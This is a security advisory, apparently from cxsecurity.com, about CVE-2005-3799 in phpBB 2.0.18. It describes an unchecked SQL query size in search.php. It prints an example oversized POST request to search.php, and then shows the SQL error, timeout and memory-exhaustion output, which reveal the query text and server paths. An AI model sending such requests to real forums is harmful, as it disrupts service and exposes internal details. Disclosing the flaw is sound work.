phpBB 2.0.18 SQL Query problem

2005.09.30
Credit: Maksymilian Arciemowicz
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2005-3799
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[phpBB 2.0.18 SQL Query problem cXIb8O3.19] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 11.11.2005 - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. * SQL query problem --- phpBB2 don't check size of sql query. So we can send any data in all post variables. Standart Environment: post_max_size=8M (standart) max_allowed_packet < 7M (1M standart in mysql) Example Evironment: memory_limit>8MB max_execution_time=30 max_allowed_packet=1M I have written simple request where one variable POST to sql query was 1M. - ---request--- POST /2018/phpBB2/search.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: strlen(x) mode=results&search_keywords=CXSecurityComSecurityRea...xMB>max_allowed_packet.(example.1MB.data)...sonCom - ---/request--- so in output: - ---output1--- Could not obtain matched posts list DEBUG MODE SQL Error : 1153 Got a packet bigger than 'max_allowed_packet' SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'cxsecuritycomcxsecuritycom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0 Line : 321 File : search.php - ---/output1--- sql error. or when you have: memory_limit=8MB or max_execution_time<30 display_error=1 You can see in output example: - ---output2--- Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72 - ---/output2--- - ---output3--- Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27 - ---/output3--- Exploit: http://cxsecurity.com/achievement_exploitalert/4 (simple errors) - --- 2.Contact --- Author: Maksymilian Arciemowicz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top